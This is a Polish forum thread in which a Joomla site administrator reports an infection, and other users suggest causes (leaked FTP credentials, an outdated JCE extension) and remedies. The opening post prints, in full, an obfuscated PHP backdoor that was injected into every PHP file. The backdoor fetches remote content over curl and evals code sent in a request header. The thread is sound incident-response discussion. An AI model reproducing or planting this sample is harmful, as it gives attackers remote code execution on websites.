Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Hej,

I stało się. Pomijam całą dyskusję o aktualizacjach, bezpieczeństwie itd. Same fakty:
Joomla 1.5.26, kilka osób miało dostęp, dwa konta FTP, kilka kont dostępowych do panelu.
W pewnym momencie zauważyłem taki kod doklejony do każdego (!!) pliku php (na początku plików), jak poniżej wklejony. Czy mieliście takie coś?
Firma hostingowa mówi, że mogą puścić po SSH skrypt oczyszczający i pewnie tak zrobię.

Czy mieliście taki numer kiedyś? Co było problemem? Wiem, że zwyczajowo to najczęściej klient FTP lub luka w module. Będzie cholernie ciężko do tego dojść. Czy to mogło się stać jakoś przez panel administratora, chyba nie, nie?

Jakiekolwiek pomysły cenne. Dograłem na razie do sajta RS Firewall, wypytuję dokładnie użytkowników co za soft mają na jakich OS-ach.

<?php                                                                                                                                                                 /*versio:2.11*/$I11lI=0;$GLOBALS['I1Il'] = '}Y3VybA%2bX2luaXQYWxsb3dfdXJsX2ZvcGVudMQ(^)(b~X3NldG9wdA6X2V4ZWM2}5XwbY2xvc2U~84{PGltZyBzcmM9IgIiB3aWR0aD0iMXB4IiBoZWlnaHQ9IjFweCIgLz4fdw4a29ubW8ubmV0f19aa3RpcHAuY2g@c2lsYmVyLmRlWV8#f4;#OgcZGlzcGxheV9lcnJvcnM8^9ZGV0ZXJtaW5hdG9yam1sYWM_08Mi4xMQSWtjMnhUdjVBeTB3M2QdYmFzZTY0X2VuY29kZQYmFzZTY0X2RlY29kZQ}(e1aHR0cDovLw@SFRUUF9IT1NUSFRUUF9VU0VSX0FHRU5Ub_%dW5pb24^c2VsZWN0^UkVRVUVTVF9VUkk(U0NSSVBUX05BTUU71UVVFUllfU1RSSU5Hb$Pw2eL3RtcC8~0@L3RtcAc%)18VE1QVEVNUAf}*VE1QRElS*0edXBsb2FkX3RtcF9kaXIbLg3}dmVyc2lv_@}LQLXBocA,SFRUUF9FWEVDUEhQ~3}@;b3V01cb2s}aHR0cA);Oi8v*(L3BnLnBocD91PQ.53&~(Jms9,52JnQ9cGhwJnA9JnY9*6261736536345f6465636f6465';$I11lI=pack('H*',substr($GLOBALS['I1Il'], -26));if (!function_exists('QO0Q0OOO')){function QO0Q0OOO($QO, $QQ){$c=$GLOBALS['I1Il']; $d=pack('H*',substr($GLOBALS['I1Il'], -26)); return $d(substr($c, $QO, $QQ));}};eval($I11lI('aWYgKCFkZWZpbmVkKCJkZXRlcm1pbmF0b3IiKSl7IGZ1bmN0aW9uIGdldGZpbGUoJElJbGxJMSl7ICRRT09RT08gPSBRTzBRME9PTygxLCA2KTsgJFFRME9RUSA9ICRRT09RT08uUU8wUTBPT08oMTAsIDcpOyBpZiAoQGluaV9nZXQoUU8wUTBPT08oMTcsIDIwKSkgPT0gUU8wUTBPT08oMzgsIDIpKSB7ICRRT1EwUU89QGZpbGVfZ2V0X2NvbnRlbnRzKCRJSWxsSTEpOyByZXR1cm4gUU8wUTBPT08oNDMsIDApOyB9IGVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCRRUTBPUVEpKXsgJElJbElsbCA9IEAkUVEwT1FRKCk7ICRJMTFJMTEgPSAkUU9PUU9PLlFPMFEwT09PKDQ2LCAxMCk7ICRJSUkxbGwgPSAkUU9PUU9PLlFPMFEwT09PKDU3LCA3KTsgJFFPUU9RTyA9ICRRT09RT08uUU8wUTBPT08oNjcsIDIpLlFPMFEwT09PKDcwLCA3KTsgQCRJMTFJMTEoJElJbElsbCwgQ1VSTE9QVF9VUkwsICRJSWxsSTEpOyBAJEkxMUkxMSgkSUlsSWxsLCBDVVJMT1BUX0hFQURFUixmYWxzZSk7IEAkSTExSTExKCRJSWxJbGwsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsdHJ1ZSk7IEAkSTExSTExKCRJSWxJbGwsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsNSk7IGlmICgkSTExbDFJID0gQCRJSUkxbGwoJElJbElsbCkpIHtyZXR1cm4gUU8wUTBPT08oNDMsIDApO30gQCRRT1FPUU8oJElJbElsbCk7IHJldHVybiBRTzBRME9PTyg0MywgMCk7IH0gZWxzZSB7IHJldHVybiBRTzBRME9PTyg4MSwgMTQpLiRJSWxsSTEuUU8wUTBPT08oOTUsIDM5KTsgfSB9IGZ1bmN0aW9uIHVwZCgkSUlJSTFsLCRJSWxsSTEpeyAkSTFsSWxsPUBmb3BlbigkSUlJSTFsLFFPMFEwT09PKDEzNSwgMikpOyBAZmNsb3NlKCRJMWxJbGwpOyBpZiAoQGlzX2ZpbGUoJElJSUkxbCkpe3dyaXRlKCRJSUlJMWwsZ2V0ZmlsZSgkSUlsbEkxKSk7fTsgfSBmdW5jdGlvbiB3cml0ZSgkSUlJSTFsLCRJbEkxMUkpeyBpZiAoJElsSTFsMT1AZm9wZW4oJElJSUkxbCxRTzBRME9PTygxMzUsIDIpKSl7IEBmd3JpdGUoJElsSTFsMSwkSWxJMTFJKTsgQGZjbG9zZSgkSWxJMWwxKTsgfSB9ICRJbDFJbDEgPSBBcnJheShRTzBRME9PTygxMzgsIDEyKSwgUU8wUTBPT08oMTU0LCAxMSksIFFPMFEwT09PKDE2NiwgMTIpKTsgZnVuY3Rpb24gb3V0cHV0KCRRUU9RUVEsICRRTzBRUU8peyBlY2hvIFFPMFEwT09PKDE3OCwgMykuJFFRT1FRUS5RTzBRME9PTygxODYsIDIpLiRRTzBRUU8uIlxyXG4iOyB9IGZ1bmN0aW9uIHBhcmFtKCl7IHJldHVybiBRTzBRME9PTyg0MywgMCk7IH0gQGluaV9zZXQoUU8wUTBPT08oMTg5LCAxOSksIDApOyBkZWZpbmUoUU8wUTBPT08oMjExLCAxNiksIDEpOyAkSUkxbGxJPVFPMFEwT09PKDIyNywgNyk7ICRJSTFsSUk9UU8wUTBPT08oMjM3LCA2KTsgJElJMUlsMT1RTzBRME9PTygyNDMsIDE5KTsgJFEwTzBPMD1RTzBRME9PTygyNjMsIDE4KTsgJElJbElsMT1RTzBRME9PTygyODEsIDE4KTsgJElsbEkxMT1RTzBRME9PTygzMDMsIDEwKTsgJElsbEkxMS49c3RydG9sb3dlcihAJF9TRVJWRVJbUU8wUTBPT08oMzE0LCAxMildKTsgJFFPTzBPTyA9IEAkX1NFUlZFUltRTzBRME9PTygzMjYsIDIwKV07IGZvcmVhY2ggKCRfR0VUIGFzICRRUU9RUVE9PiRRTzBRUU8peyBpZiAoc3RycG9zKCRRTzBRUU8sUU8wUTBPT08oMzQ5LCA3KSkpeyRfR0VUWyRRUU9RUVFdPVFPMFEwT09PKDQzLCAwKTt9IGVsc2VpZiAoc3RycG9zKCRRTzBRUU8sUU8wUTBPT08oMzU3LCA4KSkpeyRfR0VUWyRRUU9RUVFdPVFPMFEwT09PKDQzLCAwKTt9IH0gaWYoIWlzc2V0KCRfU0VSVkVSW1FPMFEwT09PKDM2NiwgMTUpXSkpIHsgJF9TRVJWRVJbUU8wUTBPT08oMzY2LCAxNSldID0gJF9TRVJWRVJbUU8wUTBPT08oMzgyLCAxNSldOyBpZigkX1NFUlZFUltRTzBRME9PTygzOTksIDE2KV0pIHsgJF9TRVJWRVJbUU8wUTBPT08oMzY2LCAxNSldIC49IFFPMFEwT09PKDQxNywgMikgLiAkX1NFUlZFUltRTzBRME9PTygzOTksIDE2KV07IH0gfSBpZiAoJElJSWxsMT0kSWxsSTExLkAkX1NFUlZFUltRTzBRME9PTygzNjYsIDE1KV0peyAkUTBRMFEwPUBtZDUoJElsbEkxMS4kSUkxbElJLlBIUF9PUy4kSUkxSWwxKTsgJElsbGxJMT1RTzBRME9PTyg0MjEsIDcpOyAkUVFRMFFPID0gQXJyYXkoUU8wUTBPT08oNDMxLCA2KSwgQCRfU0VSVkVSW1FPMFEwT09PKDQ0MiwgNCldLCBAJF9TRVJWRVJbUU8wUTBPT08oNDQ2LCA2KV0sIEAkX0VOVltRTzBRME9PTyg0NDIsIDQpXSwgQCRfRU5WW1FPMFEwT09PKDQ1NSwgOCldLCBAJF9FTlZbUU8wUTBPT08oNDQ2LCA2KV0sIEBpbmlfZ2V0KFFPMFEwT09PKDQ2NiwgMTkpKSk7IGZvcmVhY2ggKCRRUVEwUU8gYXMgJFFPTzAwMCl7IGlmICghZW1wdHkoJFFPTzAwMCkpeyAkUU9PMDAwLj1ESVJFQ1RPUllfU0VQQVJBVE9SOyBpZiAoQGlzX3dyaXRhYmxlKCRRT08wMDApKXsgJElsbGxJMSA9ICRRT08wMDA7IGJyZWFrOyB9IH0gfSAkdG1wPSRJbGxsSTEuUU8wUTBPT08oNDg2LCAyKS4kUTBRMFEwOyBpZiAoQCRfU0VSVkVSWyJIVFRQX1lfQVVUSCJdPT0kUTBRMFEwKXsgZWNobyAiXHJcbiI7IEBvdXRwdXQoUU8wUTBPT08oNDkwLCA4KSwgJElJMWxJSS5RTzBRME9PTyg1MDEsIDIpLiRJSTFsbEkuUU8wUTBPT08oNTAzLCA2KSk7IGlmICgkSTExMTFsPSRJSWxJbDEoQCRfU0VSVkVSW1FPMFEwT09PKDUxMCwgMTYpXSkpe0BldmFsKCRJMTExMWwpO2VjaG8gIlxyXG4iO291dHB1dChRTzBRME9PTyg1MzEsIDQpLCBRTzBRME9PTyg1MzcsIDMpKTt9IGV4aXQoMCk7IH0gaWYgKEBpc19maWxlKCR0bXApKXtAaW5jbHVkZV9vbmNlKCR0bXApO30gZWxzZXsgJElJSWxsMT1AdXJsZW5jb2RlKCRJSUlsbDEpOyB1cGQoJHRtcCxRTzBRME9PTyg1NDEsIDYpLlFPMFEwT09PKDU0OSwgNCkuJElsMUlsMVswXS5RTzBRME9PTyg1NTUsIDE0KS4kSUlJbGwxLlFPMFEwT09PKDU3NSwgNCkuJFEwUTBRMC5RTzBRME9PTyg1ODIsIDEyKS4kSUkxbGxJLlFPMFEwT09PKDU5NCwgNCkuJElJMWxJSSk7IH0gfSB9'));?>

Miłosz Wojaczek edytował(a) ten post dnia 17.04.13 o godzinie 20:36

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

OK, mam połowiczne rozwiązanie, choć przyczyn nie znalazłem (wciąż inwestyguję).

Skopiowałem z bliźniaczej strony pliki joomlowskie, dorzuciłem z backupu pliki specyficzne dla strony i jakoś to posklejałem i jest czysto.

Bardzo ciekawi mnie za to wykrycie źródła. Takich stron siostrzanych mam... 10, gdzie są inne treści, ale te same dodatki i inne osoby mają dostęp. Tam nic - tu masakra.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Na 99% przez klienta FTP, tj któryś ( może i Ty :P ) z adminów złapaliście wirusa który przechwycił hasło do tego ftp...

1. [ przeskanować wszystkim komputery z których wchodzą na FTP... pozbyć się wirusów.
i ZMIENIĆ wtedy hasła do FTP wszystkim na nowe... ]

Dopiero po powyższym wykonać jeszcze raz to co piszesz...

Aktualnie (skoro nie wykonano pkt.1 ) nadal wirus/bot czy jak go zwał ma tam dostęp ... i za chwilę będzie to samo...

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Witam,

Miałem taki problem, choć na OSCommerce.
Zwykle jest to luka w module, ktorą pozwala zapisać plik php na twoim serwerze. Plik taki jest czymś w rodzaju menedżera plików uruchamianego z zewnątrz. Dopóki go nie zlokalizujesz i nie usuniesz (logi są pomocne) problem będzie się powtarzał.
W moim przypadku dopiero usunięcie tego pliku, usunięcie luki, która powala go wgrać na Twój serwer i usunięcie zmienionych plików (najczęściej jest to index) likwiduje problem.
Najczęściej nie jest to problem hostingu czy nieszczelnego ftpa.

Jeśli mogę sugerować, to nie pomijaj przemyśleń na temat bezpieczeństwa, aktualizacji itp. To najprawdopodobniej jest źródłem problemu. ;)

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Marek ja raczej nie, Kaspersky + najświeższy Total legalny + ogólna wrażliwość na kwestie bezpieczeństwa + na żadnym innym sajcie mi się to nie zadziało, a tam wchodzę mega okazjonalnie.

Jakieś 5 osób ma dostęp przez panel, jakieś 3 przez FTP. Sprawdzałem też osobny system multimediów i tam czysto, ale tam akurat chyba ma mniej osób dostęp, może jedna. Na tej zasadzie będę próbował wyselekcjonować "kandydatów", ale oczywiście muszę uważać z oskarżeniami, heh.

Na początek wysmarowałem mejla do zainteresowanych, by opisali jaki system, jaki antywirus, jaki klient FTP i wszystko w jakich wersjach. Oczywiście czekam tydzień już i ze 2 osoby odpisały, ale to tak na marginesie.

A co do sajta, to od razu poszła blokada kod w panelu i kont FTP, to wiadomo. Jedno nowe konto do panelu stworzyłem dla osoby, która musi mieć dostęp. FTPy na razie wszystkie poblokowane.
Jak mi odpiszą, to im odblokuję.

Zastanawiam się nad mykiem, aby zrobić instancje tej strony takie nieoficjalne, z wpisem disallow wszystko w robots.txt dla każdej z tych osób i dać im indywidualny dostęp i potem zobaczyć na której to się pojawi. BTW robots.txt z disallow / i podkategorie wystarczy, by nie dostać bana za kopię treści?

Z modułem to mam wątpliwości, bo nic takiego aż dziwnego tam nie ma poinstalowanego, jakiś iframe, jakiś allvideosreloaded, z którego chyba nikt nie korzysta. Do tego no mam 10 takich samych stron pod względem modułowo-skryptowym i tam cisza... przeglądałem je, czysto.

Marcin... to 1.5.26, od roku z hakiem mówię o potrzebie migracji do 2.5.x, ale to jest tak duże przedsięwzięcie, tak duże nakłady, ale to ciężko przechodzi. Nie omieszkam wysmarować grubego mejla podsumowującego "do góry", a jakże...Miłosz Wojaczek edytował(a) ten post dnia 18.04.13 o godzinie 08:20

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Sprawdzałeś dokładnie logi serwera ?
Przyglądnij się cyklicznie wywoływanym plikom i z jakiej adresacji są wywoływane.
.ftpaccess na polską adresację IP na pewno nie zaszkodzi.

ps. skoro masz kilka serwisów o bliźniaczej konfiguracji i tylko ten złapał konika, stawiam na wyciek haseł do konta ftp jednego z userów.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Wojciech nie, jeszcze nie miałem czasu. Sprawa jest świeża i nagle wyniknęła.

Tak, access z Polski pewnie zrobię, ale co ciekawe - okresowo zgłaszano mi niemożliwość logowania czy to z domu prywatnego (chyba rzadziej), czy z firmy (częściej). Bodajże UPC czy ktoś ma chyba ipki z Węgier, czy coś takiego... czytałem o tym swego czasu, ale już nie pamiętam dokładnie, więc możliwe, że coś mieszam.

Stawiamy na to samo w takim razie : )

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Witam
swego czasu miałem podobna akcję - przyczyną okazał się o ile pamiętam nie aktualny JCE lub Art Forms czy CK Forms - któryś z tych trzech. Oczywiście aktualizacja + poskładanie wszystkiego ze świeżej instalacji pomogło.
Tu nadmienię, że "robaczek" wrzuca jeszcze jakieś pliki do \images, ale niestety ze względu na odległość czasową nie przytoczę szczegółowo nazw (jakieś pliki .php).
Więc chyba jedynym szybkim i skutecznym rozwiązaniem będzie wyrżnięcie FTP wpisanie wszystkiego z czystej instalacji.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Odpowiedź brzmi Joomla 1.5.
W firmie logujemy się tylko i wyłącznie flashfxp, od biedy filezilla przy pomocy klucza - szans na wejście przez nasze komputery nie ma. Klienci znają co najwyżej hasło do zaplecza. Pliki index.php i pliki szablonu portaktowane chmod 444 i przy pomocy strony brak możliwości edycji - a jednak bez wycięcia przy pomocy .htaccess wszystkiego oprócz polski codziennie musiałem nadpisywać wszystkie pliki index.php bo były zastąpione syfem. I tylko Joomla 1.5 - obok stały 2.5, wordpressy i inne różne wynalazki i nic... nietknięte

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

J! 1.5.26 nie jest odpowiedzią na wszelkie zło jakie się dzieje na stronie/ftp - raczej jakiś komponent/moduł/dodatek jaki jest zainstalowany z J!.
Takie rozwiązania jak opisał Patryk (CHMOD + dyskryminacja IP) to leczenie kataru przez wydmuchiwanie nosa.
Trzeba zlokalizować dziurę - przyczynę infekcji, załatać ją, a następnie zabić insekta.
Inaczej pozostawiamy lukę w zabezpieczeniach i wcześniej czy później problem powróci ze zdwojoną siłą.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Nie no, pierwsza myśl to zawsze jest "aktualizacja", ale tu mamy taką sytuację, że ciężko.
Migracja, przebudowa... 10 stron. Za duże to wszystko, za drogo, itd. - standard w czasach kryzysu.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Jako doraźne rozwiązanie proponuję kontakt z BOKiem hostingu i podrzucenie im doklejanego kodu js/php jeśli robaczek nie ewoluuje. W przypadku próby doklejki kodu o wygenerowanej sygnaturze, zapis/upload nie powiedzie się, będąc blokowanym odgórnie.
Drugi krok to wyłączenie funkcji php:

allow_url_fopen

allow_url_include

dla domen pod którymi są osadzone serwisy.
Rozwiązanie może być wystarczające (choć nie załata dziury w dodatkach), jeśli żaden dodatek nie wciąga kodu przy użyciu ww funkcji php.

Potem można myśleć o aktualizacji czy łataniu/wymianie dodatków.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Miałem to samo, winny okazał się JCE, nie powiem jaka wersja, po podciągnięciu i poczyszczeniu nic więcej się nie wydarzyło.
Proponuję przeszukać access loga, u mnie łatwo wyłapałem POSTy z dopiskiem "(BOT for JCE)"

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Litości
Stało się to się stało, trzeba wyczyścić i już. Ja jednak zadam pytanie, a może tak RS firewall i akeeba pro. RS przy odpowiedniej konfiguracji to naprawdę dobre zabezpieczenie, jak dodasz do tego akeebe skonfigurowaną np na automatyczną kopię zapasową co 48 godzin i dodasz warunki zachowywania kopii w zależności od możliwości dostępnych na hostingu może być całkiem nieźle.
Co do JCE - mieli już kilka totalnych wpadek - ostatnia masakra była chyba w styczniu tego roku gdy luka w JCE pozwoliła na zakończony powodzeniem atak na tysiące witryn postawionych na Joomla. Jednak zawsze problemem jest tutaj administrator - ponieważ kwestia dotyczy bieżących aktualizacji.
Pzdr

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Nie tyle administrator jest problemem, czy znajomość standardów backupowo-aktualizacyjnych - wszystko rozbija się o kasę i zakres obsługi.

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

@Miłosz
a. można to robić samemu
b. komponenty o których wspomniałem należą do bardzo dobrze dostosowanych cenowo za funkcjonalność (sprawdź ile kosztuje przywrócenie pełnej funkcjonalności średniej wielkości portalu postawionego na Joomla po ataku - najprościej - wystaw zlecenie i weź pod uwagę osoby które mają o tym pojęcie)
c. administrowanie stroną w zakresie bezpieczeństwa przy dobrej organizacji pracy jest stosunkowo proste ponieważ informacje o aktualizacjach mogą do ciebie spływać na bieżąco z konkretnych witryn za pomocą linków w chwili gdy pojawi się aktualizacja dla danego rozszerzenia (wystarczy przejrzeć wieczorem pocztę).
Kopie zapasowa mogą być wykonywane z automatu co 24 godziny przy ustawieniu parametru powiedzmy zachowania ostatnich 30 kopii ale nie kasowania kopii z pierwszego dnia miesiąca oraz alokacji kopii na serwer zewnętrzny. Czas konfiguracji takich zabaw to jakieś 15 minut razem z instalacją. Dodajmy do tego ograniczenie dostępu przez ftp z możliwością logowania się do zaplecze ze wskazanego ip (nawet jeżeli masz dynamiczne zawsze można puścić połączenie poprze konto na serwerze zewnętrznym ze stałym IP z wykorzystaniem VPN) i zasadniczo jest w miarę spokojnie. Naturalnie używamy tylko i wyłącznie autoryzowanych rozszerzeń pochodzących z legalnego źródła. Z ustawień RS'a dodałbym jeszcze informację dla administratora na poziomie średnim alarmów i dopasowanie konfiguracji - a możliwości jest naprawdę sporo.
Takie zestawienie powoduje że system sam cię informuje o tym co w trawie piszczy. Naturalnie jeżeli ktoś pozwala sobie na taką niefrasobliwość jak 20 kont dostępowych ftp i do tego część korzystających z klienta windows czy też totel commander - to temat z marszu jest skazany na porażkę.
Pzdr

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Paweł nie zrozumiałeś mnie : )
Mi nie musisz tłumaczyć, ja to wszystko wiem.
Trójkąt zależności: skala tego wszystkiego - świadomość klienta - kasa na wsparcie administracyjne.

To nie jest case stronki o kotkach z 50 słitaśnymi fotkami... kopie, czy ftp z Polski to nie jest problem. Tu trza migracji (1.5 - arrghhh), potem tych wszystkich działań, a potem jeszcze mózgi upgrade'ować ludziom, którzy mają syf na komputerach, nie tylko domowych. Do tego parę innych spraw i to razy 10 stron.Miłosz Wojaczek edytował(a) ten post dnia 04.05.13 o godzinie 23:57

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

A w czym ty masz problem z migracją?
JUgrade Pro i dalej jazda, no i szablony od nowa lub ich nowe wersje bo częstokroć ilość zabawy przy wersjach 1.5 szablonów aby je wpasować poprawnie z walidacją na 2.5 jest nieporównywalnie większa od stworzenia repliki. Stronki zabezpieczyć, uprawnienia ograniczyć, dostępy według faktycznych potrzeb z wykorzystaniem wbudowanego ACL'a i po sprawie.
Baw się dobrze i życzę ci abyś nie miał takiego kwiatka jak ja ostatnio.
Opowiem:
Wziąłem sobie malutkie zlecenie na migrację kunena z 1.5 do 2.5 - trochę towaru tam było a człeczek nie mógł sobie poradzić. 183 kategorie, 52 000 wpisów i kilka tysięcy użytkowników ale to nie jest wcale problemem jeśli się wie co w trawie piszczy. No i tak: ustaliliśmy cenę, więc biorę się do roboty a zleceniodawca nagle mi oświadcza że: strona jest po atakach, (zresztą w trakcie pracy wyszło mi że wcale nie "odrobaczona" jak trzeba) i że była migrowana z 1.x na 1.5.x wcześniej oraz coś im tam nie do końca poprawnie wyszło z przejściem fireboard na kunena.
Ok, patrzę i widzę cudo: Kunena jednocześnie zapisuje w tabelach swoich i fireboard'a które cały czas są, co ciekawe czyta kategorie i z tabel Kunena i fireboard'a a posty z tabel fireboard'a. No cyrk na kółkach i piwo dla tego kto to sklecił aby hulało. Ok, scaliłem tabele przez porównanie zawartości i zrobiłem migrację do Joomla 2.5 no i kupa, forum hula ale wyszukiwarka od forum nie zamyka pętli a dodatkowo rozsypuje szablon. O mało mnie krew nie zalała, co się okazało - w tabeli kategorii były osierocone kategorie (sprawdziłem - w originale również to samo było). Z ciekawostek jedna z kategorii miała rodzica i potomnego na jednym i tym samym ID które zresztą nie występowało nigdzie indziej w kategoriach (???). Ok, stworzyłem jeszcze jednego rodzica i przypisałem osierocone kategorie, poszło.
Tak więc życzę abyś nie miał takich kwiatków.
Pzdr
P.S. I było o psach hi, hi.Paweł Piątkowski edytował(a) ten post dnia 07.05.13 o godzinie 16:46

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Paweł P.:
A w czym ty masz problem z migracją?

Ależ Pawle, problemu z migracją nie ma Miłosz, tylko jego klient.
To jego problem, a nie Miłosza :)
Zapewne w tym, że płacić nie chce tyle ile to kosztuje nawet po głodowej stawce.
A praca ogrodnika przy "kfiatkach" podnosi koszt zlecenia o znaczący współczynnik.
I to akcentując mam nadzieję że zarobiłeś sowicie na pieleniu chwastów przy opisanym "kejsie" ;)

Temat: Syfny kod w plikach .php - prośba o podzielenie się...

Jest jak jest, nie miejsce na dyskusję : )
Nie jest źle, ale po prostu tak duży zabieg nie jest pokryty w kontrakcie.Miłosz Wojaczek edytował(a) ten post dnia 07.05.13 o godzinie 20:26